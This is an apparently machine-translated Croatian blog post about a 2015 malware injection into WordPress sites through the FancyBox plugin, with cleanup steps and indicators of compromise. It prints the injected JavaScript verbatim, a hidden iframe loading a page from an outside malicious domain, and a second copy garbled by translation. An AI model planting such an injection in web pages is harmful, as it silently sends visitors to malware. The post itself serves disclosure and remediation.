Početkom tjedna niz stranica i blogova sa Wordpress, dobio upozorenja od infekcija zlonamjernim softverom kroz Google webmasteri.
Problem na koji Google webmasteri odnosi se na prisutnost a bakalar / scenarij iframe malware na izvornim web stranicama.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>Čini se da je riječ o a ranjivost a dodatakstjecanjeFancyBox za WordPress koji do jučer (05.02.2015.) dugo nije bio ažuriran.
Rješavanje ovog problema i dezinfekcija virusnih mjesta s ovim malwareom, to je relativno jednostavno.
1. Onemogućite dodatak FancyBox.
2. Izbrišite sve FancyBox datoteke dodataka s poslužitelja (putem FTP-a)
3. Instalirajte novu verziju dodatka (FancyBox 3.0.4)
FancyBox za WordPress 3.0.4
– Preimenovana je postavka na koju utječe sigurnosni problem naveden u 3.0.3. Ovo bi trebalo spriječiti pojavljivanje zlonamjernog koda na web-mjestima na kojima se dodatak ažurira bez uklanjanja zlonamjernog koda.
FancyBox za WordPress 3.0.3
– Riješen je sigurnosni problem.
Informacije o zlonamjernom softveru:
VRSTA: iframe preusmjeravanje
CILJA: WordPress Fancybox
DOMENA MALVERA: 203koko.eu
URI MALWARE: http://203koko.eu/hjnfh/ipframe2.php
RAW KOD MALVERA: <iframe src=”http://203koko.eu/hjnfh/ipframe2.php” širina=”20″ visina=”30″ ></iframe>
SKRIPTA MALVERA: <scenarij>if (navigator.userAgent.match(/msie/i)) {document.write(‘ <div stil=”pozicija:apsolutna;lijevo:-2000px;širina:2000px”>
Uklonite zlonamjerni softver sa svoje WordPress web stranice.
